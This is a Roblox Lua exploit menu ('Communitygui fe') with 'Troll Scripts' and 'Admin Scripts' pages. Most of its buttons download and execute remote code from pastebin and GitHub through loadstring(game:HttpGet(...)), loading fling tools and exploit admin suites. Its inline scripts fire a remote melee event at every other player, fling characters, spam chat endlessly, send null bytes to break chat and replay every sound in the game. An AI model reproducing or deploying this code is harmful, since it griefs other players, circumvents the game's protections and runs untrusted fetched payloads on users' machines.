local cka = Instance.new("ScreenGui") local CoolGui = Instance.new("Frame") local title = Instance.new("TextLabel") local Left = Instance.new("TextButton") local Right = Instance.new("TextButton") local pg1 = Instance.new("Frame") local ipg = Instance.new("Frame") local pgt = Instance.new("TextLabel") local button = Instance.new("TextButton") local button_2 = Instance.new("TextButton") local button_3 = Instance.new("TextButton") local button_4 = Instance.new("TextButton") local button_5 = Instance.new("TextButton") local button_6 = Instance.new("TextButton") local button_7 = Instance.new("TextButton") local button_8 = Instance.new("TextButton") local button_9 = Instance.new("TextButton") local button_10 = Instance.new("TextButton") local button_11 = Instance.new("TextButton") local button_12 = Instance.new("TextButton") local button_13 = Instance.new("TextButton") local button_14 = Instance.new("TextButton") local button_15 = Instance.new("TextButton") local button_16 = Instance.new("TextButton") local ipg2 = Instance.new("Frame") local pgt_2 = Instance.new("TextLabel") local button_17 = Instance.new("TextButton") local button_18 = Instance.new("TextButton") local button_19 = Instance.new("TextButton") local button_20 = Instance.new("TextButton") local button_21 = Instance.new("TextButton") local button_22 = Instance.new("TextButton") local button_23 = Instance.new("TextButton") local button_24 = Instance.new("TextButton") local button_25 = Instance.new("TextButton") local button_26 = Instance.new("TextButton") local button_27 = Instance.new("TextButton") local button_28 = Instance.new("TextButton") local button_29 = Instance.new("TextButton") local button_30 = Instance.new("TextButton") local button_31 = Instance.new("TextButton") local button_32 = Instance.new("TextButton") local pg2 = Instance.new("Frame") local ipg_2 = Instance.new("Frame") local pgt_3 = Instance.new("TextLabel") local button_33 = Instance.new("TextButton") local button_34 = Instance.new("TextButton") local button_35 = Instance.new("TextButton") local button_36 = Instance.new("TextButton") local button_37 = Instance.new("TextButton") local button_38 = Instance.new("TextButton") local button_39 = Instance.new("TextButton") local ipg2_2 = Instance.new("Frame") local pgt_4 = Instance.new("TextLabel") local button_40 = Instance.new("TextButton") local button_41 = Instance.new("TextButton") local button_42 = Instance.new("TextButton") local button_43 = Instance.new("TextButton") local button_44 = Instance.new("TextButton") local button_45 = Instance.new("TextButton") local pg3 = Instance.new("Frame") local ipg_3 = Instance.new("Frame") local pgt_5 = Instance.new("TextLabel") local button_46 = Instance.new("TextButton") local button_47 = Instance.new("TextButton") local button_48 = Instance.new("TextButton") local button_49 = Instance.new("TextButton") local button_50 = Instance.new("TextButton") local button_51 = Instance.new("TextButton") local button_52 = Instance.new("TextButton") local button_53 = Instance.new("TextButton") local button_54 = Instance.new("TextButton") local button_55 = Instance.new("TextButton") local button_56 = Instance.new("TextButton") local button_57 = Instance.new("TextButton") local button_58 = Instance.new("TextButton") local button_59 = Instance.new("TextButton") local button_60 = Instance.new("TextButton") local button_61 = Instance.new("TextButton") local ipg2_3 = Instance.new("Frame") local pgt_6 = Instance.new("TextLabel") local button_62 = Instance.new("TextButton") local button_63 = Instance.new("TextButton") local button_64 = Instance.new("TextButton") local button_65 = Instance.new("TextButton") local button_66 = Instance.new("TextButton") local button_67 = Instance.new("TextButton") local button_68 = Instance.new("TextButton") local button_69 = Instance.new("TextButton") local button_70 = Instance.new("TextButton") local button_71 = Instance.new("TextButton") local pg4 = Instance.new("Frame") local ipg_4 = Instance.new("Frame") local pgt_7 = Instance.new("TextLabel") local button_72 = Instance.new("TextButton") local button_73 = Instance.new("TextButton") local button_74 = Instance.new("TextButton") local button_75 = Instance.new("TextButton") local cpg = Instance.new("Frame") local credits = Instance.new("TextLabel") local addon = Instance.new("Frame") local stitle = Instance.new("TextLabel") local slabel = Instance.new("TextLabel") local slabel_2 = Instance.new("TextLabel") local input = Instance.new("TextBox") local input_2 = Instance.new("TextBox") local slabel_3 = Instance.new("TextLabel") local input_3 = Instance.new("TextBox") local sbutton = Instance.new("TextButton") local cope = Instance.new("TextButton") --Properties: cka.Name = "cka" cka.Parent = game.Players.LocalPlayer.PlayerGui cka.ZIndexBehavior = Enum.ZIndexBehavior.Sibling CoolGui.Name = "CoolGui" CoolGui.Parent = cka CoolGui.BackgroundColor3 = Color3.fromRGB(0, 0, 0) CoolGui.BorderColor3 = Color3.fromRGB(255, 0, 0) CoolGui.BorderSizePixel = 3 CoolGui.Position = UDim2.new(0, 3, 0.300000012, 0) CoolGui.Size = UDim2.new(0, 300, 0, 400) title.Name = "title" title.Parent = CoolGui title.BackgroundColor3 = Color3.fromRGB(0, 0, 0) title.BorderColor3 = Color3.fromRGB(255, 0, 0) title.BorderSizePixel = 3 title.Size = UDim2.new(0, 300, 0, 40) title.Font = Enum.Font.SourceSans title.Text = "Communitygui fe by davicap2014" title.TextColor3 = Color3.fromRGB(255, 255, 255) title.TextSize = 24.000 Left.Name = "Left" Left.Parent = CoolGui Left.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Left.BorderColor3 = Color3.fromRGB(255, 0, 0) Left.BorderSizePixel = 3 Left.Position = UDim2.new(-0.00333333341, 0, 0.100000001, 0) Left.Size = UDim2.new(0.50150001, 0, 0.0900000036, 0) Left.Font = Enum.Font.SourceSans Left.Text = "<" Left.TextColor3 = Color3.fromRGB(255, 255, 255) Left.TextSize = 48.000 Left.MouseButton1Down:connect(function() if pg1.Visible == true then pg4.Visible = true pg3.Visible = false pg2.Visible = false pg1.Visible = false end if pg2.Visible == true then pg4.Visible = false pg3.Visible = false pg2.Visible = false pg1.Visible = true end if pg3.Visible == true then pg4.Visible = false pg3.Visible = false pg2.Visible = true pg1.Visible = false end if pg4.Visible == true then pg4.Visible = false pg3.Visible = true pg2.Visible = false pg1.Visible = false end end) Right.Name = "Right" Right.Parent = CoolGui Right.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Right.BorderColor3 = Color3.fromRGB(255, 0, 0) Right.BorderSizePixel = 3 Right.Position = UDim2.new(0.49666667, 0, 0.100000001, 0) Right.Size = UDim2.new(0.50150007, 0, 0.0900000036, 0) Right.Font = Enum.Font.SourceSans Right.Text = ">" Right.TextColor3 = Color3.fromRGB(255, 255, 255) Right.TextSize = 48.000 Right.MouseButton1Down:connect(function() if pg1.Visible == true then pg4.Visible = false pg3.Visible = false pg2.Visible = true pg1.Visible = false end if pg2.Visible == true then pg4.Visible = false pg3.Visible = true pg2.Visible = false pg1.Visible = false end if pg3.Visible == true then pg4.Visible = true pg3.Visible = false pg2.Visible = false pg1.Visible = false end if pg4.Visible == true then pg4.Visible = false pg3.Visible = false pg2.Visible = false pg1.Visible = true end end) pg1.Name = "pg1" pg1.Parent = CoolGui pg1.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pg1.BorderColor3 = Color3.fromRGB(255, 0, 0) pg1.BorderSizePixel = 3 pg1.Position = UDim2.new(0, 0, 0.190000042, 0) pg1.Size = UDim2.new(0, 300, 0, 304) ipg.Name = "ipg" ipg.Parent = pg1 ipg.BackgroundColor3 = Color3.fromRGB(0, 0, 0) ipg.BorderColor3 = Color3.fromRGB(255, 0, 0) ipg.BorderSizePixel = 3 ipg.Size = UDim2.new(0, 146, 0, 304) pgt.Name = "pgt" pgt.Parent = ipg pgt.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pgt.BorderColor3 = Color3.fromRGB(255, 0, 0) pgt.BorderSizePixel = 3 pgt.Size = UDim2.new(0, 146, 0, 30) pgt.Font = Enum.Font.SourceSansBold pgt.Text = "Troll Scripts" pgt.TextColor3 = Color3.fromRGB(255, 255, 255) pgt.TextSize = 14.000 pgt.TextWrapped = true button.Name = "button" button.Parent = ipg button.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button.BorderColor3 = Color3.fromRGB(255, 0, 0) button.BorderSizePixel = 3 button.Position = UDim2.new(0, 0, 0.0986842141, 0) button.Size = UDim2.new(0, 71, 0, 25) button.Font = Enum.Font.SourceSans button.Text = "Fling Gui" button.TextColor3 = Color3.fromRGB(255, 255, 255) button.TextSize = 14.000 button.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/saMtiek2",true))() end) button_2.Name = "button" button_2.Parent = ipg button_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_2.BorderColor3 = Color3.fromRGB(255, 0, 0) button_2.BorderSizePixel = 3 button_2.Position = UDim2.new(0.513698637, 0, 0.0986842141, 0) button_2.Size = UDim2.new(0, 71, 0, 25) button_2.Font = Enum.Font.SourceSans button_2.Text = "Illuminati" button_2.TextColor3 = Color3.fromRGB(255, 255, 255) button_2.TextSize = 14.000 button_2.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://gist.githubusercontent.com/jointeamck/5d8a45ea83d64db757182c7fae4caeae/raw/27d5fe5866fc61208fead93a7caeeb854f1c1be4/Illuminati%2520Laser%2520Fling",true))() end) button_3.Name = "button" button_3.Parent = ipg button_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_3.BorderColor3 = Color3.fromRGB(255, 0, 0) button_3.BorderSizePixel = 3 button_3.Position = UDim2.new(0.513999999, 0, 0.180999994, 0) button_3.Size = UDim2.new(0, 71, 0, 25) button_3.Font = Enum.Font.SourceSans button_3.TextColor3 = Color3.fromRGB(255, 255, 255) button_3.TextSize = 14.000 button_4.Name = "button" button_4.Parent = ipg button_4.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_4.BorderColor3 = Color3.fromRGB(255, 0, 0) button_4.BorderSizePixel = 3 button_4.Position = UDim2.new(0, 0, 0.180999994, 0) button_4.Size = UDim2.new(0, 71, 0, 25) button_4.Font = Enum.Font.SourceSans button_4.Text = "Train Engine" button_4.TextColor3 = Color3.fromRGB(255, 255, 255) button_4.TextSize = 14.000 button_4.MouseButton1Down:connect(function() --[[ Thomas The Dank Engine: By: KrystalTeam Features: Being a dank engine that kill people Version: 1.0.0.2 --]] local p = game.Players.LocalPlayer.Character local weld = Instance.new("Weld",p.Torso) weld.Part0 = p.Torso local train = Instance.new("Part",p.Torso) train.Anchored = true train.CanCollide = false train.Size = Vector3.new(3,2,6) train.CustomPhysicalProperties = PhysicalProperties.new(0,0,0,0,0) weld.Part1 = train weld.C1 = CFrame.new(0,0,0) * CFrame.Angles(0,math.rad(180),0) train.Anchored = false local TrainMesh = Instance.new("SpecialMesh",train) TrainMesh.MeshType = Enum.MeshType.FileMesh TrainMesh.Scale = Vector3.new(0.020,0.020,0.015) TrainMesh.MeshId = "rbxassetid://431017802" TrainMesh.TextureId = "rbxassetid://431017809" local weld2 = Instance.new("Weld",p.Torso) weld2.Part0 = p.Torso local Smoke = Instance.new("Part",p.Torso) Smoke.Anchored = true Smoke.CanCollide = false Smoke.Size = Vector3.new(1,1,1) Smoke.CustomPhysicalProperties = PhysicalProperties.new(0,0,0,0,0) weld2.Part1 = Smoke weld2.C1 = CFrame.new(0,-4,3.5)-- * CFrame.Angles(0,math.rad(180),0) Smoke.Anchored = false Smoke.Transparency = 1; local Particle = Instance.new("ParticleEmitter",Smoke) Particle.Rate = 50; Particle.Speed = NumberRange.new(30,60); Particle.VelocitySpread = 4; Particle.Texture = "rbxassetid://133619974" local Light = Instance.new("SpotLight",train) Light.Angle = 45; Light.Brightness = 100; Light.Face = Enum.NormalId.Back; Light.Range = 30; spawn(function() while p.Humanoid.Health ~= 0 do p.Humanoid.WalkSpeed = 60; wait(); end end) for i,v in pairs(p:GetChildren()) do if v:IsA("Part") then v.Transparency = 1; elseif v:IsA("Hat") then v:Destroy() elseif v:IsA("Model") then v:Destroy() end end local function SFX(id) local s=Instance.new("Sound",p.Torso); s.SoundId = "rbxassetid://"..id; s.Volume = 1; return s; end local Debounce = false train.Touched:connect(function(p) if Debounce == false then Debounce = true if p.Parent then if p.Parent:IsA("Model") then if game.Players:FindFirstChild(p.Parent.Name) then if p.Parent.Name ~= game.Players.LocalPlayer.Name then spawn(function() for i, plr in pairs(game.Players:GetChildren()) do if plr.Name ~= game.Players.LocalPlayer.Name then for i = 1, 10 do game.ReplicatedStorage.meleeEvent:FireServer(plr) end end end end) local Whistle = SFX(475073913) Whistle:Play() end end end end wait() Debounce = false end end) local Music = SFX(190819252) Music.Looped = true; wait(1) Music:Play(); --------------------------------------------------------------------------------- if game:GetService("ReplicatedStorage"):FindFirstChild("juisdfj0i32i0eidsuf0iok") then hiddenfling = true else hiddenfling = true detection = Instance.new("Decal") detection.Name = "juisdfj0i32i0eidsuf0iok" detection.Parent = game:GetService("ReplicatedStorage") local function fling() local hrp, c, vel, movel = nil, nil, nil, 0.1 while true do game:GetService("RunService").Heartbeat:Wait() if hiddenfling then local lp = game.Players.LocalPlayer while hiddenfling and not (c and c.Parent and hrp and hrp.Parent) do game:GetService("RunService").Heartbeat:Wait() c = lp.Character hrp = c:FindFirstChild("HumanoidRootPart") or c:FindFirstChild("Torso") or c:FindFirstChild("UpperTorso") end if hiddenfling then vel = hrp.Velocity hrp.Velocity = vel * 10000 + Vector3.new(0, 10000, 0) game:GetService("RunService").RenderStepped:Wait() if c and c.Parent and hrp and hrp.Parent then hrp.Velocity = vel end game:GetService("RunService").Stepped:Wait() if c and c.Parent and hrp and hrp.Parent then hrp.Velocity = vel + Vector3.new(0, movel, 0) movel = movel * -1 end end end end end fling() end end) button_5.Name = "button" button_5.Parent = ipg button_5.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_5.BorderColor3 = Color3.fromRGB(255, 0, 0) button_5.BorderSizePixel = 3 button_5.Position = UDim2.new(0, 0, 0.263157904, 0) button_5.Size = UDim2.new(0, 71, 0, 25) button_5.Font = Enum.Font.SourceSans button_5.Text = "sing crypted99ss" button_5.TextColor3 = Color3.fromRGB(255, 255, 255) button_5.TextSize = 14.000 button_5.MouseButton1Down:connect(function() -- Lyrics local lyrics = { "Spooky Scary Skeletons", "Send shivers down your spine", "Shrieking skulls will shock your soul", "Seal your doom tonight", "Spooky Scary Skeletons", "Speak with such a screech", "You'll shake and shudder in surprise", "When you hear these zombies shriek", "We're so sorry skeletons", "You're so misunderstood", "You only want to socialize", "But i don't think we should", "Cause spooky scary skeletons", "Shout startling shrilly screams", "They'll sneak from their sarcophagus", "And just won't leave you be.", } -- Chat function local function singLyrics() for _, lyric in ipairs(lyrics) do game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(lyric, "All") wait(2.5) -- Adjust the delay as desired end end -- Start singing singLyrics() end) button_6.Name = "button" button_6.Parent = ipg button_6.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_6.BorderColor3 = Color3.fromRGB(255, 0, 0) button_6.BorderSizePixel = 3 button_6.Position = UDim2.new(0.513698637, 0, 0.263157904, 0) button_6.Size = UDim2.new(0, 71, 0, 25) button_6.Font = Enum.Font.SourceSans button_6.Text = "Lightsaber" button_6.TextColor3 = Color3.fromRGB(255, 255, 255) button_6.TextSize = 14.000 button_6.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/KdVq9EHW",true))() end) button_7.Name = "button" button_7.Parent = ipg button_7.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_7.BorderColor3 = Color3.fromRGB(255, 0, 0) button_7.BorderSizePixel = 3 button_7.Position = UDim2.new(0, 0, 0.345473647, 0) button_7.Size = UDim2.new(0, 71, 0, 25) button_7.Font = Enum.Font.SourceSans button_7.Text = "Say Joke" button_7.TextColor3 = Color3.fromRGB(255, 255, 255) button_7.TextSize = 14.000 button.MouseButton1Down:connect(function() local HttpService = game:GetService('HttpService') local check = "https://official-joke-api.appspot.com/jokes/random" local final1 = game:HttpGet(check) local final = string.gsub(final1, "[%[%]]", "") local decoded = HttpService:JSONDecode(final) game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(decoded.setup, 'All') wait(2) game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(decoded.punchline, 'All') end) button_8.Name = "button" button_8.Parent = ipg button_8.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_8.BorderColor3 = Color3.fromRGB(255, 0, 0) button_8.BorderSizePixel = 3 button_8.Position = UDim2.new(0.513999999, 0, 0.345473647, 0) button_8.Size = UDim2.new(0, 71, 0, 25) button_8.Font = Enum.Font.SourceSans button_8.Text = "Sing Rickroll" button_8.TextColor3 = Color3.fromRGB(255, 255, 255) button_8.TextSize = 14.000 button_8.MouseButton1Down:connect(function() local delay = 2.5 function send(text) local A_delay = text local A_2 = "All" local event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest event:FireServer(A_delay, A_2) end send("We're no strangers to love") wait(delay) send("You know the rules, and so do I") wait(delay) send("A full commitment's what I'm thinking of") wait(delay) send("You wouldn't get this from any other guy") wait(delay) send("I just wanna tell you how I'm feeling") wait(delay) send("Gotta make you understand") wait(delay) send("Never gonna give you up") wait(delay) send("Never gonna let you down") wait(delay) send("Never gonna run around and desert you") wait(delay) send("Never gonna make you cry") wait(delay) send("Never gonna say goodbye") wait(delay) send("Never gonna tell a lie and hurt you") wait(delay) send("We've known each other for so long") wait(delay) send("Your heart's been aching but you're too shy to say it") wait(delay) send("Inside we both know what's been going on") wait(delay) send("We know the game and we're gonna play it") wait(delay) send("And if you ask me how I'm feeling") wait(delay) send("Don't tell me you're too blind to see") wait(delay) send("Never gonna give you up") wait(delay) send("Never gonna let you down") wait(delay) send("Never gonna run around and desert you") wait(delay) send("Never gonna make you cry") wait(delay) send("Never gonna say goodbye") wait(delay) send("Never gonna tell a lie and hurt you") wait(delay) send("Never gonna give you up") wait(delay) send("Never gonna let you down") wait(delay) send("Never gonna run around and desert you") wait(delay) send("Never gonna make you cry") wait(delay) send("Never gonna say goodbye") wait(delay) send("Never gonna tell a lie and hurt you") wait(delay) send("Never gonna give, never gonna give (Give you up)") wait(delay) send("We've known each other for so long") wait(delay) send("Your heart's been aching but you're too shy to say it") wait(delay) send("Inside we both know what's been going on") wait(delay) send("We know the game and we're gonna play it") wait(delay) send("I just wanna tell you how I'm feeling") wait(delay) send("Gotta make you understand") wait(delay) send("Never gonna give you up") wait(delay) send("Never gonna let you down") wait(delay) send("Never gonna run around and desert you") wait(delay) send("Never gonna make you cry") wait(delay) send("Never gonna say goodbye") wait(delay) send("Never gonna tell a lie and hurt you") wait(delay) send("Never gonna give you up") wait(delay) send("Never gonna let you down") wait(delay) send("Never gonna run around and desert you") wait(delay) send("Never gonna make you cry") wait(delay) send("Never gonna say goodbye") wait(delay) send("Never gonna tell a lie and hurt you") wait(delay) send("Never gonna give you up") wait(delay) send("Never gonna let you down") wait(delay) send("Never gonna run around and desert you") wait(delay) send("Never gonna make you cry") wait(delay) send("Never gonna say goodbye") end) button_9.Name = "button" button_9.Parent = ipg button_9.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_9.BorderColor3 = Color3.fromRGB(255, 0, 0) button_9.BorderSizePixel = 3 button_9.Position = UDim2.new(0, 0, 0.427631587, 0) button_9.Size = UDim2.new(0, 71, 0, 25) button_9.Font = Enum.Font.SourceSans button_9.Text = "Glitch Sound" button_9.TextColor3 = Color3.fromRGB(255, 255, 255) button_9.TextSize = 14.000 button_9.MouseButton1Down:connect(function() local duration = 999999 -- integer only, no decimals if game:GetService("SoundService").RespectFilteringEnabled then return end local sounds = {} for i,v in pairs(Game:GetDescendants()) do if v:IsA("Sound") then table.insert(sounds,v) end end local con = Game.DescendantAdded:Connect(function(v) if v:IsA("Sound") then table.insert(sounds,v) end end) wait(.1) local start = math.floor(tick()) repeat for i,v in pairs(sounds) do v:Play() v.TimePosition = math.random(0,v.TimeLength * 1000)/1000 task.wait() end until math.floor(tick()) == start + duration con:Disconnect() for i,v in pairs(sounds) do v:Stop() end end) button_10.Name = "button" button_10.Parent = ipg button_10.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_10.BorderColor3 = Color3.fromRGB(255, 0, 0) button_10.BorderSizePixel = 3 button_10.Position = UDim2.new(0.513698637, 0, 0.427631587, 0) button_10.Size = UDim2.new(0, 71, 0, 25) button_10.Font = Enum.Font.SourceSans button_10.Text = "Spam Text" button_10.TextColor3 = Color3.fromRGB(255, 255, 255) button_10.TextSize = 14.000 button_10.MouseButton1Down:connect(function() while true do local args = { [1] = input_2.Text, [2] = "All" } game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args)) wait(1.5) end end) button_11.Name = "button" button_11.Parent = ipg button_11.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_11.BorderColor3 = Color3.fromRGB(255, 0, 0) button_11.BorderSizePixel = 3 button_11.Position = UDim2.new(0, 0, 0.5099473, 0) button_11.Size = UDim2.new(0, 71, 0, 25) button_11.Font = Enum.Font.SourceSans button_11.TextColor3 = Color3.fromRGB(255, 255, 255) button_11.TextSize = 14.000 button_12.Name = "button" button_12.Parent = ipg button_12.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_12.BorderColor3 = Color3.fromRGB(255, 0, 0) button_12.BorderSizePixel = 3 button_12.Position = UDim2.new(0.513999999, 0, 0.5099473, 0) button_12.Size = UDim2.new(0, 71, 0, 25) button_12.Font = Enum.Font.SourceSans button_12.TextColor3 = Color3.fromRGB(255, 255, 255) button_12.TextSize = 14.000 button_13.Name = "button" button_13.Parent = ipg button_13.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_13.BorderColor3 = Color3.fromRGB(255, 0, 0) button_13.BorderSizePixel = 3 button_13.Position = UDim2.new(0.513698637, 0, 0.592105269, 0) button_13.Size = UDim2.new(0, 71, 0, 25) button_13.Font = Enum.Font.SourceSans button_13.Text = "Break Chat" button_13.TextColor3 = Color3.fromRGB(255, 255, 255) button_13.TextSize = 14.000 button_13.MouseButton1Down:connect(function() for i=1,3 do if game:GetService("TextChatService"):FindFirstChild("TextChannels") then game:GetService("TextChatService").TextChannels.RBXGeneral:SendAsync("\0") else game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("\0", "All") end end end) button_14.Name = "button" button_14.Parent = ipg button_14.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_14.BorderColor3 = Color3.fromRGB(255, 0, 0) button_14.BorderSizePixel = 3 button_14.Position = UDim2.new(0, 0, 0.592105269, 0) button_14.Size = UDim2.new(0, 71, 0, 25) button_14.Font = Enum.Font.SourceSans button_14.Text = "Soviet Anthem" button_14.TextColor3 = Color3.fromRGB(255, 255, 255) button_14.TextSize = 14.000 button_14.MouseButton1Down:connect(function() -- Lyrics local lyrics = { "An unbreakable union of free republics,", "Great Russia has been sealed forever.", "Long live, the creation by the people's will,", "The united, mighty Soviet Union!", "Be glorified, our free motherland,", "Reliable stronghold of the people's friendship!", "The Party of Lenin – the strength of the people,", "Leads us to the triumph of Communism!", "Through storms, the sun of freedom shone on us,", "And Great Lenin illuminated our path.", "To a righteous cause, he raised the people", "To labor and achievements, we were inspired!", "Be glorified, our free motherland,", "Reliable stronghold of the people's friendship!", "The Party of Lenin – the strength of the people,", "Leads us to the triumph of Communism!", "In the victory of Communism's immortal ideas,", "We see the future of our country!", "And to the red banner of the glorious Motherland,", "We will always be devotedly true!", "Be glorified, our free motherland,", "Reliable stronghold of the people's friendship!", "The Party of Lenin – the strength of the people,", "Leads us to the triumph of Communism!", } -- Chat function local function singLyrics() for _, lyric in ipairs(lyrics) do game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(lyric, "All") wait(6) -- Adjust the delay as desired end end -- Start singing singLyrics() end) button_15.Name = "button" button_15.Parent = ipg button_15.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_15.BorderColor3 = Color3.fromRGB(255, 0, 0) button_15.BorderSizePixel = 3 button_15.Position = UDim2.new(0.513999999, 0, 0.674421012, 0) button_15.Size = UDim2.new(0, 71, 0, 25) button_15.Font = Enum.Font.SourceSans button_15.Text = "Fling All" button_15.TextColor3 = Color3.fromRGB(255, 255, 255) button_15.TextSize = 14.000 button_15.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/zqyDSUWX"))() end) button_16.Name = "button" button_16.Parent = ipg button_16.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_16.BorderColor3 = Color3.fromRGB(255, 0, 0) button_16.BorderSizePixel = 3 button_16.Position = UDim2.new(0, 0, 0.674421012, 0) button_16.Size = UDim2.new(0, 71, 0, 25) button_16.Font = Enum.Font.SourceSans button_16.TextColor3 = Color3.fromRGB(255, 255, 255) button_16.TextSize = 14.000 ipg2.Name = "ipg2" ipg2.Parent = pg1 ipg2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) ipg2.BorderColor3 = Color3.fromRGB(255, 0, 0) ipg2.BorderSizePixel = 3 ipg2.Position = UDim2.new(0.49666667, 0, 0, 0) ipg2.Size = UDim2.new(0, 150, 0, 304) pgt_2.Name = "pgt" pgt_2.Parent = ipg2 pgt_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pgt_2.BorderColor3 = Color3.fromRGB(255, 0, 0) pgt_2.BorderSizePixel = 3 pgt_2.Size = UDim2.new(0, 150, 0, 30) pgt_2.Font = Enum.Font.SourceSansBold pgt_2.Text = "Admin Scripts and Guis" pgt_2.TextColor3 = Color3.fromRGB(255, 255, 255) pgt_2.TextSize = 14.000 pgt_2.TextWrapped = true button_17.Name = "button" button_17.Parent = ipg2 button_17.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_17.BorderColor3 = Color3.fromRGB(255, 0, 0) button_17.BorderSizePixel = 3 button_17.Position = UDim2.new(0, 0, 0.0986842141, 0) button_17.Size = UDim2.new(0, 71, 0, 25) button_17.Font = Enum.Font.SourceSans button_17.Text = "Infinite Yield" button_17.TextColor3 = Color3.fromRGB(255, 255, 255) button_17.TextSize = 14.000 button_17.MouseButton1Down:connect(function() loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))() end) button_18.Name = "button" button_18.Parent = ipg2 button_18.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_18.BorderColor3 = Color3.fromRGB(255, 0, 0) button_18.BorderSizePixel = 3 button_18.Position = UDim2.new(0.513698757, 0, 0.0986842141, 0) button_18.Size = UDim2.new(0, 73, 0, 25) button_18.Font = Enum.Font.SourceSans button_18.Text = "Nameless FE" button_18.TextColor3 = Color3.fromRGB(255, 255, 255) button_18.TextSize = 14.000 button_18.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/NamelessAdmin/main/Source"))(); end) button_19.Name = "button" button_19.Parent = ipg2 button_19.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_19.BorderColor3 = Color3.fromRGB(255, 0, 0) button_19.BorderSizePixel = 3 button_19.Position = UDim2.new(0, 0, 0.180999994, 0) button_19.Size = UDim2.new(0, 71, 0, 25) button_19.Font = Enum.Font.SourceSans button_19.Text = "Script Hub" button_19.TextColor3 = Color3.fromRGB(255, 255, 255) button_19.TextSize = 14.000 button_19.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/ScriptHub"))(); end) button_20.Name = "button" button_20.Parent = ipg2 button_20.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_20.BorderColor3 = Color3.fromRGB(255, 0, 0) button_20.BorderSizePixel = 3 button_20.Position = UDim2.new(0.51399982, 0, 0.18099995, 0) button_20.Size = UDim2.new(0, 73, 0, 25) button_20.Font = Enum.Font.SourceSans button_20.Text = "Arosia admin" button_20.TextColor3 = Color3.fromRGB(255, 255, 255) button_20.TextSize = 14.000 button_20.MouseButton1Down:connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/Jn47kK5D'))() end) button_21.Name = "button" button_21.Parent = ipg2 button_21.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_21.BorderColor3 = Color3.fromRGB(255, 0, 0) button_21.BorderSizePixel = 3 button_21.Position = UDim2.new(0.513698757, 0, 0.263157904, 0) button_21.Size = UDim2.new(0, 73, 0, 25) button_21.Font = Enum.Font.SourceSans button_21.Text = "OPFinality" button_21.TextColor3 = Color3.fromRGB(255, 255, 255) button_21.TextSize = 14.000 button_21.MouseButton1Down:connect(function() loadstring(game:HttpGet('https://rawscripts.net/raw/OpFinality_590'))() end) button_22.Name = "button" button_22.Parent = ipg2 button_22.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_22.BorderColor3 = Color3.fromRGB(255, 0, 0) button_22.BorderSizePixel = 3 button_22.Position = UDim2.new(0, 0, 0.263157904, 0) button_22.Size = UDim2.new(0, 71, 0, 25) button_22.Font = Enum.Font.SourceSans button_22.Text = "Rocky's Admin" button_22.TextColor3 = Color3.fromRGB(255, 255, 255) button_22.TextSize = 14.000 button_22.MouseButton1Down:connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/rockysadmin"))() end) button_23.Name = "button" button_23.Parent = ipg2 button_23.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_23.BorderColor3 = Color3.fromRGB(255, 0, 0) button_23.BorderSizePixel = 3 button_23.Position = UDim2.new(0.51399982, 0, 0.345473647, 0) button_23.Size = UDim2.new(0, 73, 0, 25) button_23.Font = Enum.Font.SourceSans button_23.Text = "T0PK3K" button_23.TextColor3 = Color3.fromRGB(255, 255, 255) button_23.TextSize = 14.000 button_23.MouseButton1Down:connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/h1TN1kij'))() end) button_24.Name = "button" button_24.Parent = ipg2 button_24.BackgroundColor3 = Color3.fromRGB(0, 0, 0) button_24.BorderColor3 = Color3.fromRGB(255, 0, 0) button_24.BorderSizePixel = 3 button_24.Position = UDim2.new(0, 0, 0.345473647, 0) button_24.Size = UDim2.new(0, 71, 0, 25) button_24.Font = Enum.Font.SourceSans button_24.Text = "simple admin" button_24.TextColor3 = Color3.fromRGB(255, 255, 255) button_24.TextSize = 14.000 